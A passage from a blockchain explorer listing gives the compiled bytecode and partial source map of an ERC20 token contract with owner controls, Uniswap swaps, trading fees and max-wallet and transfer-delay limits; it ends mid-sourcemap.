0000000000000169063791ac94790611ced90859060009086903090429060040161211a565b600060405180830381600087803b158015611d0757600080fd5b505af1158015611d1b573d6000803e3d6000fd5b505050505050565b611d4e307f000000000000000000000000000000000000000000000000000000000000000084610cf1565b601c5460405163f305d71960e01b81523060048201526024810184905260006044820181905260648201526001600160a01b0391821660848201524260a48201527f00000000000000000000000000000000000000000000000000000000000000009091169063f305d71990839060c40160606040518083038185885af1158015611ddd573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611e02919061218b565b5050505050565b600060208083528351808285015260005b81811015611e3657858101830151858201604001528201611e1a565b81811115611e48576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b0381168114610cee57600080fd5b60008060408385031215611e8657600080fd5b8235611e9181611e5e565b946020939093013593505050565b600060208284031215611eb157600080fd5b8135611b4481611e5e565b600080600060608486031215611ed157600080fd5b8335611edc81611e5e565b92506020840135611eec81611e5e565b929592945050506040919091013590565b60008060408385031215611f1057600080fd5b8235611f1b81611e5e565b915060208301358015158114611f3057600080fd5b809150509250929050565b60008060408385031215611f4e57600080fd5b8235611f5981611e5e565b91506020830135611f3081611e5e565b600181811c90821680611f7d57607f821691505b60208210811415611f9e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60008219821115611fcd57611fcd611fa4565b500190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60008160001904831182151516156120a9576120a9611fa4565b500290565b6000826120cb57634e487b7160e01b600052601260045260246000fd5b500490565b6000828210156120e2576120e2611fa4565b500390565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561210f57600080fd5b8151611b4481611e5e565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101561216a5784516001600160a01b031683529383019391830191600101612145565b50506001600160a01b03969096166060850152505050608001529392505050565b6000806000606084860312156121a057600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220381692242a530bdf6cf493c780f92a557d01e0e5c40d85226da5c7c6aa091ef564736f6c634300080b00334f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572

Deployed Bytecode

0x6080604052600436106102975760003560e01c80637bce5a041161015a578063b62496f5116100c1578063dd62ed3e1161007a578063dd62ed3e146107b8578063e2f45605146107fe578063f11a24d314610814578063f2fde38b1461082a578063f63743421461084a578063f8b45b051461086057600080fd5b8063b62496f514610701578063bbc0c74214610731578063c024666814610752578063c876d0b914610772578063c8c8ebe41461078c578063d85ba063146107a257600080fd5b80639c3b4fdc116101135780639c3b4fdc146106695780639fccce321461067f578063a0d82dc514610695578063a1dc92bc146106ab578063a457c2d7146106c1578063a9059cbb146106e157600080fd5b80637bce5a04146105d55780638a8c523c146105eb5780638da5cb5b146106005780638ea5220f1461061e578063921369131461063e57806395d89b411461065457600080fd5b806339509351116101fe57806370a08231116101b757806370a0823114610513578063715018a614610549578063751039fc146105605780637571336a1461057557806375f0a874146105955780637b208769146105b557600080fd5b8063395093511461045157806344249f041461047157806349bd5a5e146104875780634a62bb65146104bb5780636a486a8e146104dc5780636ddd1713146104f257600080fd5b806318160ddd1161025057806318160ddd146103be5780631a8145bb146103d35780631f3fed8f146103e957806323b872dd146103ff57806327c8f8351461041f578063313ce5671461043557600080fd5b806306fdde03146102a3578063095ea7b3146102ce5780630d7f1441146102fe57806310d5de531461032257806315945790146103525780631694505e1461038a57600080fd5b3661029e57005b600080fd5b3480156102af57600080fd5b506102b8610876565b6040516102c59190611e09565b60405180910390f35b3480156102da57600080fd5b506102ee6102e9366004611e73565b610908565b60405190151581526020016102c5565b34801561030a57600080fd5b5061031460125481565b6040519081526020016102c5565b34801561032e57600080fd5b506102ee61033d366004611e9f565b601e6020526000908152604090205460ff1681565b34801561035e57600080fd5b50600354610372906001600160a01b031681565b6040516001600160a01b0390911681526020016102c5565b34801561039657600080fd5b506103727f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b3480156103ca57600080fd5b50600254610314565b3480156103df57600080fd5b5061031460185481565b3480156103f557600080fd5b5061031460175481565b34801561040b57600080fd5b506102ee61041a366004611ebc565b61091e565b34801561042b57600080fd5b5061037261dead81565b34801561044157600080fd5b50604051601281526020016102c5565b34801561045d57600080fd5b506102ee61046c366004611e73565b6109cd565b34801561047d57600080fd5b5061031460165481565b34801561049357600080fd5b506103727f000000000000000000000000fb46e63896aff16b754956a2dc1e211a6783c78d81565b3480156104c757600080fd5b50601c546102ee90600160a01b900460ff1681565b3480156104e857600080fd5b5061031460115481565b3480156104fe57600080fd5b50601c546102ee90600160b01b900460ff1681565b34801561051f57600080fd5b5061031461052e366004611e9f565b6001600160a01b031660009081526020819052604090205490565b34801561055557600080fd5b5061055e610a09565b005b34801561056c57600080fd5b5061055e610a3f565b34801561058157600080fd5b5061055e610590366004611efd565b610a82565b3480156105a157600080fd5b50601b54610372906001600160a01b031681565b3480156105c157600080fd5b50601a54610372906001600160a01b031681565b3480156105e157600080fd5b50610314600e5481565b3480156105f757600080fd5b5061055e610ad7565b34801561060c57600080fd5b506006546001600160a01b0316610372565b34801561062a57600080fd5b50601c54610372906001600160a01b031681565b34801561064a57600080fd5b5061031460135481565b34801561066057600080fd5b506102b8610b18565b34801561067557600080fd5b5061031460105481565b34801561068b57600080fd5b5061031460195481565b3480156106a157600080fd5b5061031460155481565b3480156106b757600080fd5b50610314600d5481565b3480156106cd57600080fd5b506102ee6106dc366004611e73565b610b27565b3480156106ed57600080fd5b506102ee6106fc366004611e73565b610bc0565b34801561070d57600080fd5b506102ee61071c366004611e9f565b601f6020526000908152604090205460ff1681565b34801561073d57600080fd5b50601c546102ee90600160a81b900460ff1681565b34801561075e57600080fd5b5061055e61076d366004611efd565b610bcd565b34801561077e57600080fd5b50600b546102ee9060ff1681565b34801561079857600080fd5b5061031460075481565b3480156107ae57600080fd5b50610314600c5481565b3480156107c457600080fd5b506103146107d3366004611f3b565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b34801561080a57600080fd5b5061031460085481565b34801561082057600080fd5b50610314600f5481565b34801561083657600080fd5b5061055e610845366004611e9f565b610c56565b34801561085657600080fd5b5061031460145481565b34801561086c57600080fd5b5061031460095481565b60606004805461088590611f69565b80601f01602080910402602001604051908101604052809291908181526020018280546108b190611f69565b80156108fe5780601f106108d3576101008083540402835291602001916108fe565b820191906000526020600020905b8154815290600101906020018083116108e157829003601f168201915b5050505050905090565b6000610915338484610cf1565b50600192915050565b600061092b848484610e15565b6001600160a01b0384166000908152600160209081526040808320338452909152902054828110156109b55760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6109c28533858403610cf1565b506001949350505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610915918590610a04908690611fba565b610cf1565b6006546001600160a01b03163314610a335760405162461bcd60e51b81526004016109ac90611fd2565b610a3d60006116d3565b565b6006546001600160a01b03163314610a695760405162461bcd60e51b81526004016109ac90611fd2565b601c805460ff60a01b19169055600b805460ff19169055565b6006546001600160a01b03163314610aac5760405162461bcd60e51b81526004016109ac90611fd2565b6001600160a01b03919091166000908152601e60205260409020805460ff1916911515919091179055565b6006546001600160a01b03163314610b015760405162461bcd60e51b81526004016109ac90611fd2565b601c805461ffff60a81b191661010160a81b179055565b60606005805461088590611f69565b3360009081526001602090815260408083206001600160a01b038616845290915281205482811015610ba95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016109ac565b610bb63385858403610cf1565b5060019392505050565b6000610915338484610e15565b6006546001600160a01b03163314610bf75760405162461bcd60e51b81526004016109ac90611fd2565b6001600160a01b0382166000818152601d6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6006546001600160a01b03163314610c805760405162461bcd60e51b81526004016109ac90611fd2565b6001600160a01b038116610ce55760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016109ac565b610cee816116d3565b50565b6001600160a01b038316610d535760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016109ac565b6001600160a01b038216610db45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016109ac565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b038316610e3b5760405162461bcd60e51b81526004016109ac90612007565b6001600160a01b038216610e615760405162461bcd60e51b81526004016109ac9061204c565b80610e7757610e7283836000611725565b505050565b601c54600160a01b900460ff161561133d576006546001600160a01b03848116911614801590610eb557506006546001600160a01b03838116911614155b8015610ec957506001600160a01b03821615155b8015610ee057506001600160a01b03821661dead14155b8015610ef65750600654600160a01b900460ff16155b1561133d57601c54600160a81b900460ff16610f90576001600160a01b0383166000908152601d602052604090205460ff1680610f4b57506001600160a01b0382166000908152601d602052604090205460ff165b610f905760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016109ac565b600b5460ff16156110d7576006546001600160a01b03838116911614801590610feb57507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b0316826001600160a01b031614155b801561102957507f000000000000000000000000fb46e63896aff16b754956a2dc1e211a6783c78d6001600160a01b0316826001600160a01b031614155b156110d757326000908152600a602052604090205443116110c45760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a4016109ac565b326000908152600a602052604090204390555b6001600160a01b0383166000908152601f602052604090205460ff16801561111857506001600160a01b0382166000908152601e602052604090205460ff16155b156111fc5760075481111561118d5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016109ac565b6009546001600160a01b0383166000908152602081905260409020546111b39083611fba565b11156111f75760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ac565b61133d565b6001600160a01b0382166000908152601f602052604090205460ff16801561123d57506001600160a01b0383166000908152601e602052604090205460ff16155b156112b3576007548111156111f75760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016109ac565b6001600160a01b0382166000908152601e602052604090205460ff1661133d576009546001600160a01b0383166000908152602081905260409020546112f99083611fba565b111561133d5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ac565b306000908152602081905260409020546008548110801590819061136a5750601c54600160b01b900460ff165b80156113805750600654600160a01b900460ff16155b80156113a557506001600160a01b0385166000908152601f602052604090205460ff16155b80156113ca57506001600160a01b0385166000908152601d602052604090205460ff16155b80156113ef57506001600160a01b0384166000908152601d602052604090205460ff16155b1561141d576006805460ff60a01b1916600160a01b17905561140f61187a565b6006805460ff60a01b191690555b6006546001600160a01b0386166000908152601d602052604090205460ff600160a01b90920482161591168061146b57506001600160a01b0385166000908152601d602052604090205460ff165b15611474575060005b600081156116bf576001600160a01b0386166000908152601f602052604090205460ff1680156114a657506000601154115b15611594576114cb60646114c560115488611b3890919063ffffffff16565b90611b4b565b9050601154601254826114de919061208f565b6114e891906120ae565b601660008282546114f99190611fba565b909155505060115460145461150e908361208f565b61151891906120ae565b601860008282546115299190611fba565b909155505060115460155461153e908361208f565b61154891906120ae565b601960008282546115599190611fba565b909155505060115460135461156e908361208f565b61157891906120ae565b601760008282546115899190611fba565b909155506116a19050565b6001600160a01b0387166000908152601f602052604090205460ff1680156115be57506000600c54115b156116a1576115dd60646114c5600c5488611b3890919063ffffffff16565b9050600c54600d54826115f0919061208f565b6115fa91906120ae565b6016600082825461160b9190611fba565b9091555050600c54600f54611620908361208f565b61162a91906120ae565b6018600082825461163b9190611fba565b9091555050600c54601054611650908361208f565b61165a91906120ae565b6019600082825461166b9190611fba565b9091555050600c54600e54611680908361208f565b61168a91906120ae565b6017600082825461169b9190611fba565b90915550505b80156116b2576116b2873083611725565b6116bc81866120d0565b94505b6116ca878787611725565b50505050505050565b600680546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b03831661174b5760405162461bcd60e51b81526004016109ac90612007565b6001600160a01b0382166117715760405162461bcd60e51b81526004016109ac9061204c565b6001600160a01b038316600090815260208190526040902054818110156117e95760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016109ac565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290611820908490611fba565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161186c91815260200190565b60405180910390a350505050565b3060009081526020819052604081205490506000806019546017546018546016546118a59190611fba565b6118af9190611fba565b6118b99190611fba565b9050826118c557505050565b6008546118d390601461208f565b8311156118eb576008546118e890601461208f565b92505b6000600282601854866118fe919061208f565b61190891906120ae565b61191291906120ae565b905060006119208583611b57565b90504761192c82611b63565b60006119384783611b57565b90506000611955866114c560165485611b3890919063ffffffff16565b90506000611972876114c560175486611b3890919063ffffffff16565b9050600061198f886114c560195487611b3890919063ffffffff16565b90506000818361199f86886120d0565b6119a991906120d0565b6119b391906120d0565b60006018819055601681905560178190556019819055601c546040519293506001600160a01b031691849181818185875af1925050503d8060008114611a15576040519150601f19603f3d011682016040523d82523d6000602084013e611a1a565b606091505b5050601b54604051919b506001600160a01b0316908490600081818185875af1925050503d8060008114611a6a576040519150601f19603f3d011682016040523d82523d6000602084013e611a6f565b606091505b50909a50508715801590611a835750600081115b15611ad657611a928882611d23565b601854604080518981526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b601a546040516001600160a01b03909116904790600081818185875af1925050503d8060008114611b23576040519150601f19603f3d011682016040523d82523d6000602084013e611b28565b606091505b5050505050505050505050505050565b6000611b44828461208f565b9392505050565b6000611b4482846120ae565b6000611b4482846120d0565b6040805160028082526060820183526000926020830190803683370190505090503081600081518110611b9857611b986120e7565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c16573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611c3a91906120fd565b81600181518110611c4d57611c4d6120e7565b60200260200101906001600160a01b031690816001600160a01b031681525050611c98307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610cf1565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d169063791ac94790611ced90859060009086903090429060040161211a565b600060405180830381600087803b158015611d0757600080fd5b505af1158015611d1b573d6000803e3d6000fd5b505050505050565b611d4e307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d84610cf1565b601c5460405163f305d71960e01b81523060048201526024810184905260006044820181905260648201526001600160a01b0391821660848201524260a48201527f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d9091169063f305d71990839060c40160606040518083038185885af1158015611ddd573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611e02919061218b565b5050505050565b600060208083528351808285015260005b81811015611e3657858101830151858201604001528201611e1a565b81811115611e48576000604083870101525b50601f01601f1916929092016040019392505050565b6001600160a01b0381168114610cee57600080fd5b60008060408385031215611e8657600080fd5b8235611e9181611e5e565b946020939093013593505050565b600060208284031215611eb157600080fd5b8135611b4481611e5e565b600080600060608486031215611ed157600080fd5b8335611edc81611e5e565b92506020840135611eec81611e5e565b929592945050506040919091013590565b60008060408385031215611f1057600080fd5b8235611f1b81611e5e565b915060208301358015158114611f3057600080fd5b809150509250929050565b60008060408385031215611f4e57600080fd5b8235611f5981611e5e565b91506020830135611f3081611e5e565b600181811c90821680611f7d57607f821691505b60208210811415611f9e57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b60008219821115611fcd57611fcd611fa4565b500190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60008160001904831182151516156120a9576120a9611fa4565b500290565b6000826120cb57634e487b7160e01b600052601260045260246000fd5b500490565b6000828210156120e2576120e2611fa4565b500390565b634e487b7160e01b600052603260045260246000fd5b60006020828403121561210f57600080fd5b8151611b4481611e5e565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b8181101561216a5784516001600160a01b031683529383019391830191600101612145565b50506001600160a01b03969096166060850152505050608001529392505050565b6000806000606084860312156121a057600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220381692242a530bdf6cf493c780f92a557d01e0e5c40d85226da5c7c6aa091ef564736f6c634300080b0033

Deployed Bytecode Sourcemap

32837:13395:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9690:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11857:169;;;;;;;;;;-1:-1:-1;11857:169:0;;;;;:::i;:::-;;:::i;:::-;;;1237:14:1;;1230:22;1212:41;;1200:2;1185:18;11857:169:0;1072:187:1;33656:29:0;;;;;;;;;;;;;;;;;;;1410:25:1;;;1398:2;1383:18;33656:29:0;1264:177:1;34318:63:0;;;;;;;;;;-1:-1:-1;34318:63:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;9093:22;;;;;;;;;;-1:-1:-1;9093:22:0;;;;-1:-1:-1;;;;;9093:22:0;;;;;;-1:-1:-1;;;;;1862:32:1;;;1844:51;;1832:2;1817:18;9093:22:0;1698:203:1;33060:51:0;;;;;;;;;;;;;;;10810:108;;;;;;;;;;-1:-1:-1;10898:12:0;;10810:108;;33877:33;;;;;;;;;;;;;;;;33837;;;;;;;;;;;;;;;;12508:492;;;;;;;;;;-1:-1:-1;12508:492:0;;;;;:::i;:::-;;:::i;33163:53::-;;;;;;;;;;;;33209:6;33163:53;;10652:93;;;;;;;;;;-1:-1:-1;10652:93:0;;10735:2;2744:36:1;;2732:2;2717:18;10652:93:0;2602:184:1;13409:215:0;;;;;;;;;;-1:-1:-1;13409:215:0;;;;;:::i;:::-;;:::i;33799:31::-;;;;;;;;;;;;;;;;33118:38;;;;;;;;;;;;;;;34058:33;;;;;;;;;;-1:-1:-1;34058:33:0;;;;-1:-1:-1;;;34058:33:0;;;;;;33624:28;;;;;;;;;;;;;;;;34138:31;;;;;;;;;;-1:-1:-1;34138:31:0;;;;-1:-1:-1;;;34138:31:0;;;;;;10981:127;;;;;;;;;;-1:-1:-1;10981:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;11082:18:0;11055:7;11082:18;;;;;;;;;;;;10981:127;2884:103;;;;;;;;;;;;;:::i;:::-;;45509:123;;;;;;;;;;;;;:::i;37589:167::-;;;;;;;;;;-1:-1:-1;37589:167:0;;;;;:::i;:::-;;:::i;33988:30::-;;;;;;;;;;-1:-1:-1;33988:30:0;;;;-1:-1:-1;;;;;33988:30:0;;;33953:28;;;;;;;;;;-1:-1:-1;33953:28:0;;;;-1:-1:-1;;;;;33953:28:0;;;33517:30;;;;;;;;;;;;;;;;45389:112;;;;;;;;;;;;;:::i;2233:87::-;;;;;;;;;;-1:-1:-1;2306:6:0;;-1:-1:-1;;;;;2306:6:0;2233:87;;34025:24;;;;;;;;;;-1:-1:-1;34025:24:0;;;;-1:-1:-1;;;;;34025:24:0;;;33692:31;;;;;;;;;;;;;;;;9909:104;;;;;;;;;;;;;:::i;33591:24::-;;;;;;;;;;;;;;;;33917:27;;;;;;;;;;;;;;;;33768:25;;;;;;;;;;;;;;;;33482:28;;;;;;;;;;;;;;;;14127:413;;;;;;;;;;-1:-1:-1;14127:413:0;;;;;:::i;:::-;;:::i;11321:175::-;;;;;;;;;;-1:-1:-1;11321:175:0;;;;;:::i;:::-;;:::i;34539:57::-;;;;;;;;;;-1:-1:-1;34539:57:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;34098:33;;;;;;;;;;-1:-1:-1;34098:33:0;;;;-1:-1:-1;;;34098:33:0;;;;;;37764:182;;;;;;;;;;-1:-1:-1;37764:182:0;;;;;:::i;:::-;;:::i;33403:39::-;;;;;;;;;;-1:-1:-1;33403:39:0;;;;;;;;32945:35;;;;;;;;;;;;;;;;33451:27;;;;;;;;;;;;;;;;11559:151;;;;;;;;;;-1:-1:-1;11559:151:0;;;;;:::i;:::-;-1:-1:-1;;;;;11675:18:0;;;11648:7;11675:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11559:151;32987:33;;;;;;;;;;;;;;;;33554:30;;;;;;;;;;;;;;;;3142:201;;;;;;;;;;-1:-1:-1;3142:201:0;;;;;:::i;:::-;;:::i;33730:31::-;;;;;;;;;;;;;;;;33027:24;;;;;;;;;;;;;;;;9690:100;9744:13;9777:5;9770:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9690:100;:::o;11857:169::-;11940:4;11957:39;986:10;11980:7;11989:6;11957:8;:39::i;:::-;-1:-1:-1;12014:4:0;11857:169;;;;:::o;12508:492::-;12648:4;12665:36;12675:6;12683:9;12694:6;12665:9;:36::i;:::-;-1:-1:-1;;;;;12741:19:0;;12714:24;12741:19;;;:11;:19;;;;;;;;986:10;12741:33;;;;;;;;12793:26;;;;12785:79;;;;-1:-1:-1;;;12785:79:0;;4192:2:1;12785:79:0;;;4174:21:1;4231:2;4211:18;;;4204:30;4270:34;4250:18;;;4243:62;-1:-1:-1;;;4321:18:1;;;4314:38;4369:19;;12785:79:0;;;;;;;;;12900:57;12909:6;986:10;12950:6;12931:16;:25;12900:8;:57::i;:::-;-1:-1:-1;12988:4:0;;12508:492;-1:-1:-1;;;;12508:492:0:o;13409:215::-;986:10;13497:4;13546:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13546:34:0;;;;;;;;;;13497:4;;13514:80;;13537:7;;13546:47;;13583:10;;13546:47;:::i;:::-;13514:8;:80::i;2884:103::-;2306:6;;-1:-1:-1;;;;;2306:6:0;986:10;2453:23;2445:68;;;;-1:-1:-1;;;2445:68:0;;;;;;;:::i;:::-;2949:30:::1;2976:1;2949:18;:30::i;:::-;2884:103::o:0;45509:123::-;2306:6;;-1:-1:-1;;;;;2306:6:0;986:10;2453:23;2445:68;;;;-1:-1:-1;;;2445:68:0;;;;;;;:::i;:::-;45563:14:::1;:22:::0;;-1:-1:-1;;;;45563:22:0::1;::::0;;45596:20:::1;:28:::0;;-1:-1:-1;;45596:28:0::1;::::0;;45509:123::o;37589:167::-;2306:6;;-1:-1:-1;;;;;2306:6:0;986:10;2453:23;2445:68;;;;-1:-1:-1;;;2445:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;37702:39:0;;;::::1;;::::0;;;:31:::1;:39;::::0;;;;:46;;-1:-1:-1;;37702:46:0::1;::::0;::::1;;::::0;;;::::1;::::0;;37589:167::o;45389:112::-;2306:6;;-1:-1:-1;;;;;2306:6:0;986:10;2453:23;2445:68;;;;-1:-1:-1;;;2445:68:0;;;;;;;:::i;:::-;45444:13:::1;:20:::0;;-1:-1:-1;;;;45475:18:0;-1:-1:-1;;;45475:18:0;;;45389:112::o;9909:104::-;9965:13;9998:7;9991:14;;;;;:::i;14127:413::-;986:10;14220:4;14264:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;14264:34:0;;;;;;;;;;14317:35;;;;14309:85;;;;-1:-1:-1;;;14309:85:0;;5227:2:1;14309:85:0;;;5209:21:1;5266:2;5246:18;;;5239:30;5305:34;5285:18;;;5278:62;-1:-1:-1;;;5356:18:1;;;5349:35;5401:19;;14309:85:0;5025:401:1;14309:85:0;14430:67;986:10;14453:7;14481:15;14462:16;:34;14430:8;:67::i;:::-;-1:-1:-1;14528:4:0;;14127:413;-1:-1:-1;;;14127:413:0:o;11321:175::-;11407:4;11424:42;986:10;11448:9;11459:6;11424:9;:42::i;37764:182::-;2306:6;;-1:-1:-1;;;;;2306:6:0;986:10;2453:23;2445:68;;;;-1:-1:-1;;;2445:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;37849:28:0;::::1;;::::0;;;:19:::1;:28;::::0;;;;;;;;:39;;-1:-1:-1;;37849:39:0::1;::::0;::::1;;::::0;;::::1;::::0;;;37904:34;;1212:41:1;;;37904:34:0::1;::::0;1185:18:1;37904:34:0::1;;;;;;;37764:182:::0;;:::o;3142:201::-;2306:6;;-1:-1:-1;;;;;2306:6:0;986:10;2453:23;2445:68;;;;-1:-1:-1;;;2445:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;3231:22:0;::::1;3223:73;;;::::0;-1:-1:-1;;;3223:73:0;;5633:2:1;3223:73:0::1;::::0;::::1;5615:21:1::0;5672:2;5652:18;;;5645:30;5711:34;5691:18;;;5684:62;-1:-1:-1;;;5762:18:1;;;5755:36;5808:19;;3223:73:0::1;5431:402:1::0;3223:73:0::1;3307:28;3326:8;3307:18;:28::i;:::-;3142:201:::0;:::o;17886:380::-;-1:-1:-1;;;;;18022:19:0;;18014:68;;;;-1:-1:-1;;;18014:68:0;;6040:2:1;18014:68:0;;;6022:21:1;6079:2;6059:18;;;6052:30;6118:34;6098:18;;;6091:62;-1:-1:-1;;;6169:18:1;;;6162:34;6213:19;;18014:68:0;5838:400:1;18014:68:0;-1:-1:-1;;;;;18101:21:0;;18093:68;;;;-1:-1:-1;;;18093:68:0;;6445:2:1;18093:68:0;;;6427:21:1;6484:2;6464:18;;;6457:30;6523:34;6503:18;;;6496:62;-1:-1:-1;;;6574:18:1;;;6567:32;6616:19;;18093:68:0;6243:398:1;18093:68:0;-1:-1:-1;;;;;18174:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18226:32;;1410:25:1;;;18226:32:0;;1383:18:1;18226:32:0;;;;;;;17886:380;;;:::o;38164:4847::-;-1:-1:-1;;;;;38296:18:0;;38288:68;;;;-1:-1:-1;;;38288:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;38375:16:0;;38367:64;;;;-1:-1:-1;;;38367:64:0;;;;;;;:::i;:::-;38448:11;38444:93;;38476:28;38492:4;38498:2;38502:1;38476:15;:28::i;:::-;38164:4847;;;:::o;38444:93::-;38553:14;;-1:-1:-1;;;38553:14:0;;;;38549:2487;;;2306:6;;-1:-1:-1;;;;;38606:15:0;;;2306:6;;38606:15;;;;:49;;-1:-1:-1;2306:6:0;;-1:-1:-1;;;;;38642:13:0;;;2306:6;;38642:13;;38606:49;:86;;;;-1:-1:-1;;;;;;38676:16:0;;;;38606:86;:128;;;;-1:-1:-1;;;;;;38713:21:0;;38727:6;38713:21;;38606:128;:158;;;;-1:-1:-1;38756:8:0;;-1:-1:-1;;;38756:8:0;;;;38755:9;38606:158;38584:2441;;;38804:13;;-1:-1:-1;;;38804:13:0;;;;38799:223;;-1:-1:-1;;;;;38876:25:0;;;;;;:19;:25;;;;;;;;;:52;;-1:-1:-1;;;;;;38905:23:0;;;;;;:19;:23;;;;;;;;38876:52;38842:160;;;;-1:-1:-1;;;38842:160:0;;7658:2:1;38842:160:0;;;7640:21:1;7697:2;7677:18;;;7670:30;-1:-1:-1;;;7716:18:1;;;7709:52;7778:18;;38842:160:0;7456:346:1;38842:160:0;39178:20;;;;39174:641;;;2306:6;;-1:-1:-1;;;;;39253:13:0;;;2306:6;;39253:13;;;;:72;;;39309:15;-1:-1:-1;;;;;39295:30:0;:2;-1:-1:-1;;;;;39295:30:0;;;39253:72;:129;;;;;39368:13;-1:-1:-1;;;;;39354:28:0;:2;-1:-1:-1;;;;;39354:28:0;;;39253:129;39223:573;;;39500:9;39471:39;;;;:28;:39;;;;;;39546:12;-1:-1:-1;39433:258:0;;;;-1:-1:-1;;;39433:258:0;;8009:2:1;39433:258:0;;;7991:21:1;8048:2;8028:18;;;8021:30;8087:3